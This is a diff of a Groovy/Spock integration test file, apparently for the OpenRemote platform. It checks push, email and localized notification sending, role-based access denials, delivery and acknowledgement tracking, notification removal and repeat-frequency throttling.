+    anonymousNotificationResource.sendNotification(null, notification)
+
+    then: "the request should be forbidden (no write:notifications role)"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "the admin user sends a push notification to the console assets in building realm"
+    notificationIds.clear()
+    notification.targets = [
+      new Notification.Target(Notification.TargetType.ASSET, testuser2Console.id),
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id),
+      new Notification.Target(Notification.TargetType.ASSET, anonymousConsole.id)
+    ]
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "the notification should have been sent (inc. testuser2 as message was direct to console)"
+    conditions.eventually {
+      assert notificationIds.size() == 4
+      assert notificationTargetIds.contains(testuser2Console.id)
+      assert notificationTargetIds.contains(testuser3Console1.id)
+      assert notificationTargetIds.contains(testuser3Console2.id)
+      assert notificationTargetIds.contains(anonymousConsole.id)
+    }
+
+    when: "a regular user sends a push notification to the console assets in a different realm"
+    testuser1NotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a regular user without write:notifications sends a push notification to the console assets in the same realm"
+    notificationIds.clear()
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    testuser2NotificationResource.sendNotification(null, notification)
+
+    then: "the request should be forbidden and no notification sent (write:notifications is now required to send)"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+    notificationIds.size() == 0
+
+    when: "a notification is sent using the same mechanism as an asset ruleset"
+    notificationIds.clear()
+    notificationService.sendNotification(notification, Notification.Source.ASSET_RULESET, consoleResource.getConsoleParentAssetId(realm))
+
+    then: "the notification should have been sent (inc. testuser2 as message was direct to console)"
+    conditions.eventually {
+      assert notificationIds.size() == 4
+      assert notificationTargetIds.contains(testuser2Console.id)
+      assert notificationTargetIds.contains(testuser3Console1.id)
+      assert notificationTargetIds.contains(testuser3Console2.id)
+      assert notificationTargetIds.contains(anonymousConsole.id)
+    }
+
+    when: "a restricted user sends a push notification to the console assets in the same realm"
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a restricted user sends a push notification to some consoles linked to them and some not linked to them"
+    notificationIds.clear()
+    notification.targets = [
+      new Notification.Target(Notification.TargetType.ASSET, testuser2Console.id),
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id),
+      new Notification.Target(Notification.TargetType.ASSET, anonymousConsole.id)
+    ]
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and: "no new notifications should have been sent"
+    notificationIds.size() == 0
+
+    when: "a restricted user sends a push notification to some consoles linked to them"
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    notification.targets = [
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
+      new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id)
+    ]
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "the notifications should have been sent"
+    conditions.eventually {
+      assert notificationIds.size() == 2
+      assert notificationTargetIds.contains(testuser3Console1.id)
+      assert notificationTargetIds.contains(testuser3Console2.id)
+    }
+
+    when: "the FCM token is set to null for a console asset"
+    notificationIds.clear()
+    notificationTargetIds.clear()
+    def testUser3Console1Asset = assetStorageService.find(testuser3Console1.id) as ConsoleAsset
+    testUser3Console1Asset.getConsoleProviders().map{
+      it.get(PushNotificationMessage.TYPE)
+    }.get().getData().put("token", null)
+    testUser3Console1Asset = assetStorageService.merge(testUser3Console1Asset)
+
+    then: "the cached FCM token should be removed from the handler"
+    conditions.eventually {
+      assert pushNotificationHandler.consoleFCMTokenMap.get(testUser3Console1Asset.id) == null
+    }
+
+    when: "the admin user sends a notification to a user linked to the console without an FCM token"
+    notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser3Id)]
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "the notification should have been sent"
+    conditions.eventually {
+      assert notificationIds.size() == 1
+      assert notificationTargetIds.contains(testuser3Console2.id)
+      assert !notificationTargetIds.contains(testuser3Console1.id)
+    }
+
+    when: "a notification handler throws an exception"
+    throwPushHandlerException = true
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "a bad request exception should be thrown"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    and: "the notification should be recorded in the DB with the exception set as the error"
+    conditions.eventually {
+      notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null)
+      notifications.first().error == "Failed to send notification"
+    }
+
+
+    // -----------------------------------------------
+    //    Check notification resource
+    // -----------------------------------------------
+
+    and: "all notifications sent to consoles in the building realm should be available via the REST API"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser2Console.id, null, null, null, null, null).length == 2
+      notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
+      assert notifications.length == 5
+      assert notifications.every {n ->
+        PushNotificationMessage pushMessage = n.message as PushNotificationMessage
+        pushMessage.getTitle() == "Test Action" &&
+                pushMessage.getBody() == "Click to cancel" &&
+                pushMessage.getAction() != null &&
+                n.deliveredOn == null &&
+                n.acknowledgedOn == null
+      }
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 7
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 3
+    }
+
+    when: "the admin user marks a Building console notification as delivered and requests the notifications for Building consoles"
+    adminNotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n ->
+      n.targetId == testuser3Console1.id
+    }.id)
+
+    then: "the notification should have been updated"
+    conditions.eventually {
+      notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
+      assert notifications.length == 5
+      assert notifications.count {n -> n.deliveredOn != null} == 1
+    }
+
+    when: "the admin user marks a Building console notification as delivered and requests the notifications for Building consoles"
+    adminNotificationResource.notificationAcknowledged(null, testuser3Console1.id, notifications.find {n ->
+      n.targetId == testuser3Console1.id && n.deliveredOn != null
+    }.id, new TextNode("dismissed"))
+
+    then: "the notification should have been updated"
+    conditions.eventually {
+      notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
+      assert notifications.length == 5
+      assert notifications.count {n ->
+        n.deliveredOn != null && n.acknowledgedOn != null && n.acknowledgement == "\"dismissed\""
+      } == 1
+    }
+
+    when: "a regular user marks a console notification from another realm as delivered"
+    testuser1NotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n ->
+      n.targetId == testuser3Console1.id
+    }.id)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "a regular user marks a console notification for their own console as delivered"
+    testuser3NotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n ->
+      n.targetId == testuser3Console1.id
+    }.id)
+
+    then: "the notification should have been updated"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null).count {
+        it.deliveredOn != null
+      } == 1
+    }
+
+    // TODO: Update once console permissions model finalised
+    //        when: "an anonymous user marks a console notification from another console as delivered"
+    //        anonymousNotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id}.id)
+    //
+    //        then: "access should be forbidden"
+    //        ex = thrown()
+    //        ex.response.withCloseable { r ->
+    //            assert r.status == 403
+    //        }
+
+    when: "an anonymous user marks a console notification for their own console as delivered"
+    notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null)
+    anonymousNotificationResource.notificationDelivered(null, anonymousConsole.id, notifications.find {n ->
+      n.targetId == anonymousConsole.id
+    }.id)
+
+    then: "the notification should have been updated"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).count {
+        it.deliveredOn != null
+      } == 1
+    }
+
+    when: "a regular user removes notifications of their own realm"
+    testuser1NotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, MASTER_REALM, null, null)
+
+    then: "write:notifications grants the delete and the other realm's notifications are untouched"
+    noExceptionThrown()
+    adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null).length> 0
+
+    when: "a restricted user tries to remove notifications"
+    testuser3NotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, realm, null, null)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "the admin user removes notifications by timestamp and the notifications are retrieved again"
+    notifications = adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null)
+    def sentNotification = notifications[0]
+    def removeCount = notifications.count {it.sentOn >= sentNotification.sentOn}
+    adminNotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, sentNotification.sentOn.toEpochMilli(), null, null, null, null)
+
+    then: "notifications sent after or at that time should have been removed"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null).length == (notifications.length - removeCount)
+    }
+
+    when: "the admin user removes notifications sent to specific console assets without other constraints and the notifications are retrieved again"
+    adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, testuser3Console1.id)
+    adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, testuser3Console2.id)
+
+    then: "all notifications sent to those consoles should have been removed"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null).length == 0
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 0
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 3
+    }
+
+    when: "the admin user removes notifications by type and the notifications are retrieved again"
+    adminNotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null)
+
+    then: "the notifications should have been removed"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 0
+    }
+
+    when: "the admin user removes notifications without sufficient constraints"
+    adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, null)
+
+    then: "request should not be allowed"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    // -----------------------------------------------
+    //    Check notification repeat frequency
+    // -----------------------------------------------
+
+    when: "a repeat frequency is set and a notification is sent"
+    // Clear exception flag
+    throwPushHandlerException = false
+    // Move clock to beginning of next hour
+    def advancement = Instant.ofEpochMilli(getClockTimeOf(container))
+            .truncatedTo(ChronoUnit.HOURS)
+            .plus(59, ChronoUnit.MINUTES)
+
+    advancePseudoClock(ChronoUnit.MILLIS.between(Instant.ofEpochMilli(getClockTimeOf(container)), advancement), TimeUnit.MILLISECONDS, container)
+    notification.targets = [new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id)]
+    notification.setRepeatFrequency(RepeatFrequency.HOURLY)
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "the notification should have been sent to the console"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
+    }
+
+    when: "a repeat frequency is set and a notification with the same name and scope as a previous notification is sent within the repeat window"
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "no new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
+    }
+
+    when: "a repeat frequency is set and a notification with the same name but different scope is sent within the repeat window"
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 2
+    }
+
+    when: "time advances less than the repeat frequency and the notification is sent again"
+    advancePseudoClock(30, TimeUnit.SECONDS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "no new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 2
+    }
+
+    when: "time advances more than the repeat frequency and the notification is sent again"
+    advancePseudoClock(2, TimeUnit.MINUTES, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 3
+    }
+
+    when: "a repeat interval is used and a notification with the same name and scope is sent within the repeat window"
+    notification.setRepeatInterval("P1M")
+    advancePseudoClock(10, TimeUnit.DAYS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "no new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 3
+    }
+
+    when: "time advances more than the repeat interval and the notification is sent again"
+    advancePseudoClock(25, TimeUnit.DAYS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "new notifications should have been sent"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 4
+    }
+
+    and: "notifications are retrieved only for the past day only the relevant notifications should have been returned"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, getClockTimeOf(container)-(3600000*24), null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
+    }
+
+    and: "notifications are retrieved only for the past 40 days only the relevant notifications should have been returned"
+    conditions.eventually {
+      assert adminNotificationResource.getNotifications(null, null, null, getClockTimeOf(container)-(3600000L*24*40), null, null, null, testuser3Console2.id, null, null, null, null, null).length == 4
+    }
+
+    cleanup: "the mock is removed"
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+  }
+
+  def "Check email notification functionality"() {
+
+    List<Message> sentEmails = new CopyOnWriteArrayList<>()
+
+    given: "the container environment is started with the mock handler"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig() << [(OR_EMAIL_X_HEADERS): "Test 1: Hello World 1\nTest2: Hello World 2"], defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def notificationService = container.getService(NotificationService.class)
+    def identityService = container.getService(ManagerIdentityService.class)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+
+    and: "a mock email notification handler"
+    EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
+    mockEmailNotificationHandler.isValid() >> true
+
+    // Log email and assume sent to SMTP Server
+    mockEmailNotificationHandler.sendMessage(_ as Message) >> { Message email ->
+      sentEmails << email
+      return NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+
+    when: "an email notification is sent to a realm through same mechanism as rules"
+    def notification = new Notification(
+            "Test",
+            new EmailNotificationMessage().setSubject("Test").setText("Hello world!"),
+            Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, managerTestSetup.realmBuildingName)), null, null)
+    notificationService.sendNotification(notification, Notification.Source.REALM_RULESET, managerTestSetup.realmBuildingName)
+
+    then: "the email should have been sent to the realm users with email addresses and email notifications enabled"
+    conditions.eventually {
+      assert sentEmails.size() == 2
+      assert sentEmails.every {it.content == "Hello world!"}
+      assert sentEmails.every { it.getSubject() == "Test"}
+      assert sentEmails.every {
+        it.allHeaders != null && it.getHeader("Test 1")[0] == "Hello World 1" && it.getHeader("Test2")[0] == "Hello World 2"
+      }
+      assert sentEmails.any {
+        it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "testuser2@openremote.local"
+      }
+      assert !sentEmails.any {
+        it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "testuser3@openremote.local"
+      }
+      assert sentEmails.any {
+        it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "building@openremote.local"
+      }
+    }
+
+    when: "an email attribute is added to an asset"
+    sentEmails.clear()
+    def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId)
+    kitchen.setEmail("kitchen@openremote.local")
+    kitchen = assetStorageService.merge(kitchen)
+
+    and: "an email notification is sent to a parent asset"
+    ((EmailNotificationMessage)notification.message).subject = "Test 2"
+    notification.setTargets([new Notification.Target(Notification.TargetType.ASSET, managerTestSetup.apartment1KitchenId)])
+    notificationService.sendNotification(notification)
+
+    then: "the child asset with the email attribute should have been sent an email"
+    conditions.eventually {
+      assert sentEmails.size() == 1
+      assert sentEmails.any { it.getSubject() == "Test 2"}
+      assert sentEmails.any {
+        it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "kitchen@openremote.local"
+      }
+    }
+
+    when: "an email is sent to a custom target"
+    sentEmails.clear()
+    ((EmailNotificationMessage)notification.message).subject = "Test Custom"
+    notification.setTargets([
+      new Notification.Target(Notification.TargetType.CUSTOM, "custom1@openremote.local;to:custom2@openremote.local;cc:custom3@openremote.local;bcc:custom4@openremote.local")
+    ])
+    notificationService.sendNotification(notification)
+
+    then: "the email should have been sent to all custom recipients"
+    conditions.eventually {
+      assert sentEmails.size() == 1
+      assert sentEmails.any {
+        it.getSubject() == "Test Custom" && it.allRecipients.length == 4
+      }
+      assert sentEmails.any {
+        it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.TO).any{
+          (it as InternetAddress).address == "custom1@openremote.local"
         }
-        // Auto accept the messages sent to Firebase (without calling its logic)
-        mockPushNotificationHandler.sendMessage(_ as com.google.firebase.messaging.Message) >> {
-            message -> return NotificationSendResult.success()
+      }
+      assert sentEmails.any {
+        it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.TO).any{
+          (it as InternetAddress).address == "custom2@openremote.local"
         }
-
-        notificationService.notificationHandlerMap.put(mockPushNotificationHandler.getTypeName(), mockPushNotificationHandler)
-
-        /* ----- */
-
-        and: "a mock localized notification handler"
-        def throwLocalizedHandlerException = false
-        LocalizedNotificationHandler mockLocalizedNotificationHandler = Spy(localizedNotificationHandler)
-        mockLocalizedNotificationHandler.isValid() >> true
-
-        // Intercept the messages sent
-        mockLocalizedNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                if (throwLocalizedHandlerException) {
-                    throw new Exception("Failed to send notification")
-                }
-                localizedNotificationIds << id
-                localizedNotificationTargetTypes << target.type
-                localizedNotificationTargetIds << target.id
-                localizedNotificationMessages << message
-                callRealMethod()
+      }
+      assert sentEmails.any {
+        it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.CC).any{
+          (it as InternetAddress).address == "custom3@openremote.local"
         }
-        // the notificationHandlerMap in the localized handler, should also use the same mock handlers
-        mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
+      }
+      assert sentEmails.any {
+        it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.BCC).any{
+          (it as InternetAddress).address == "custom4@openremote.local"
+        }
+      }
+    }
 
-        notificationService.notificationHandlerMap.put(localizedNotificationHandler.getTypeName(), mockLocalizedNotificationHandler)
+    cleanup: "the mock is removed"
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+  }
 
-        /* ----- */
+  def "Check localized notification functionality"() {
 
-        and: "an authenticated superuser"
-        def adminAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    List<String> localizedNotificationIds = new CopyOnWriteArrayList<>()
+    List<Notification.TargetType> localizedNotificationTargetTypes = new CopyOnWriteArrayList<>()
+    List<String> localizedNotificationTargetIds = new CopyOnWriteArrayList<>()
+    List<AbstractNotificationMessage> localizedNotificationMessages = new CopyOnWriteArrayList<>()
 
-        def notification = new Notification(
-                "MultiLanguageAction",
-                new LocalizedNotificationMessage(
-                        "en",
-                        new HashMap<String, AbstractNotificationMessage>(
+    List<String> pushNotificationIds = new CopyOnWriteArrayList<>()
+    List<Notification.TargetType> pushNotificationTargetTypes = new CopyOnWriteArrayList<>()
+    List<String> pushNotificationTargetIds = new CopyOnWriteArrayList<>()
+    List<AbstractNotificationMessage> pushNotificationMessages = new CopyOnWriteArrayList<>()
+
+    given: "the container environment is started with the mock handler"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.1, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def identityService = container.getService(ManagerIdentityService.class)
+    def notificationService = container.getService(NotificationService.class)
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def localizedNotificationHandler = container.getService(LocalizedNotificationHandler.class)
+
+    /* ----- */
+
+    and: "a mock push notification handler"
+    def throwPushHandlerException = false
+    PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+
+    // Intercept the messages sent
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      if (throwPushHandlerException) {
+        throw new Exception("Failed to send notification")
+      }
+      pushNotificationIds << id
+      pushNotificationTargetTypes << target.type
+      pushNotificationTargetIds << target.id
+      pushNotificationMessages << message
+      callRealMethod()
+    }
+    // Auto accept the messages sent to Firebase (without calling its logic)
+    mockPushNotificationHandler.sendMessage(_ as com.google.firebase.messaging.Message) >> { message ->
+      return NotificationSendResult.success()
+    }
+
+    notificationService.notificationHandlerMap.put(mockPushNotificationHandler.getTypeName(), mockPushNotificationHandler)
+
+    /* ----- */
+
+    and: "a mock localized notification handler"
+    def throwLocalizedHandlerException = false
+    LocalizedNotificationHandler mockLocalizedNotificationHandler = Spy(localizedNotificationHandler)
+    mockLocalizedNotificationHandler.isValid() >> true
+
+    // Intercept the messages sent
+    mockLocalizedNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      if (throwLocalizedHandlerException) {
+        throw new Exception("Failed to send notification")
+      }
+      localizedNotificationIds << id
+      localizedNotificationTargetTypes << target.type
+      localizedNotificationTargetIds << target.id
+      localizedNotificationMessages << message
+      callRealMethod()
+    }
+    // the notificationHandlerMap in the localized handler, should also use the same mock handlers
+    mockLocalizedNotificationHandler.notificationHandlerMap = notificationService.notificationHandlerMap
+
+    notificationService.notificationHandlerMap.put(localizedNotificationHandler.getTypeName(), mockLocalizedNotificationHandler)
+
+    /* ----- */
+
+    and: "an authenticated superuser"
+    def adminAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    def notification = new Notification(
+            "MultiLanguageAction",
+            new LocalizedNotificationMessage(
+                    "en",
+                    new HashMap<String, AbstractNotificationMessage>(
                             nl: new PushNotificationMessage("Nederlandse titel", "Nederlandse body", null, null, null),
                             en: new PushNotificationMessage("English title", "English body", null, null, null)
-                        )
-                ),
-                null,
-                null,
-                null)
+                            )
+                    ),
+            null,
+            null,
+            null)
 
-        and: "the admin notification resource"
-        def adminNotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(NotificationResource.class)
-        def adminConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(ConsoleResource.class)
+    and: "the admin notification resource"
+    def adminNotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(NotificationResource.class)
+    def adminConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(ConsoleResource.class)
 
-        when: "the admin console is registered"
-        def consoleRegistration = new ConsoleRegistration(null,
-                "Admin Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                        )
-                ),
-                "",
-                ["manager"] as String[])
-        def adminConsole = adminConsoleResource.register(null, consoleRegistration)
+    when: "the admin console is registered"
+    def consoleRegistration = new ConsoleRegistration(null,
+            "Admin Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            )
+                    ),
+            "",
+            ["manager"] as String[])
+    def adminConsole = adminConsoleResource.register(null, consoleRegistration)
 
-        then: "the admin console should have been created"
-        adminConsole.id != null
+    then: "the admin console should have been created"
+    adminConsole.id != null
 
-        and: "the push notification handler should have picked up the console token"
-        // The token map is updated from the asset persistence event, and sending to a console that is not in it yet
-        // fails the whole notification request
-        conditions.eventually {
-            assert pushNotificationHandler.consoleFCMTokenMap.containsKey(adminConsole.id)
-        }
+    and: "the push notification handler should have picked up the console token"
+    // The token map is updated from the asset persistence event, and sending to a console that is not in it yet
+    // fails the whole notification request
+    conditions.eventually {
+      assert pushNotificationHandler.consoleFCMTokenMap.containsKey(adminConsole.id)
+    }
 
-        when: "the admin user sends a push notification to the entire MASTER realm (which is only himself)"
-        notification.targets = [new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)]
-        adminNotificationResource.sendNotification(null, notification)
+    when: "the admin user sends a push notification to the entire MASTER realm (which is only himself)"
+    notification.targets = [new Notification.Target(Notification.TargetType.REALM, MASTER_REALM)]
+    adminNotificationResource.sendNotification(null, notification)
 
-        then: "all consoles in that realm should have been sent a notification"
-        conditions.eventually {
-            assert localizedNotificationIds.size() == 1
-            assert localizedNotificationTargetIds.size() == 1
-            assert localizedNotificationTargetIds.contains(adminConsole.id)
-            assert pushNotificationIds.size() == 1
-            assert pushNotificationTargetIds.size() == 1
-            assert pushNotificationTargetIds.contains(adminConsole.id)
-            assert pushNotificationMessages.size() == 1
-            assert pushNotificationMessages.get(0).type == "push"
-            assert ((PushNotificationMessage)pushNotificationMessages.get(0)).title == "English title"
-            assert ((PushNotificationMessage)pushNotificationMessages.get(0)).body == "English body"
-        }
+    then: "all consoles in that realm should have been sent a notification"
+    conditions.eventually {
+      assert localizedNotificationIds.size() == 1
+      assert localizedNotificationTargetIds.size() == 1
+      assert localizedNotificationTargetIds.contains(adminConsole.id)
+      assert pushNotificationIds.size() == 1
+      assert pushNotificationTargetIds.size() == 1
+      assert pushNotificationTargetIds.contains(adminConsole.id)
+      assert pushNotificationMessages.size() == 1
+      assert pushNotificationMessages.get(0).type == "push"
+      assert ((PushNotificationMessage)pushNotificationMessages.get(0)).title == "English title"
+      assert ((PushNotificationMessage)pushNotificationMessages.get(0)).body == "English body"
+    }
 
-        and: "we clear the cached notifications"
-        localizedNotificationIds.clear()
-        localizedNotificationTargetTypes.clear()
-        localizedNotificationTargetIds.clear()
-        localizedNotificationMessages.clear()
-        pushNotificationIds.clear()
-        pushNotificationTargetTypes.clear()
-        pushNotificationTargetIds.clear()
-        pushNotificationMessages.clear()
+    and: "we clear the cached notifications"
+    localizedNotificationIds.clear()
+    localizedNotificationTargetTypes.clear()
+    localizedNotificationTargetIds.clear()
+    localizedNotificationMessages.clear()
+    pushNotificationIds.clear()
+    pushNotificationTargetTypes.clear()
+    pushNotificationTargetIds.clear()
+    pushNotificationMessages.clear()
 
-        /* ------------ */
+    /* ------------ */
 
-        when: "a new user gets added"
-        def testuser1AccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
+    when: "a new user gets added"
+    def testuser1AccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
 
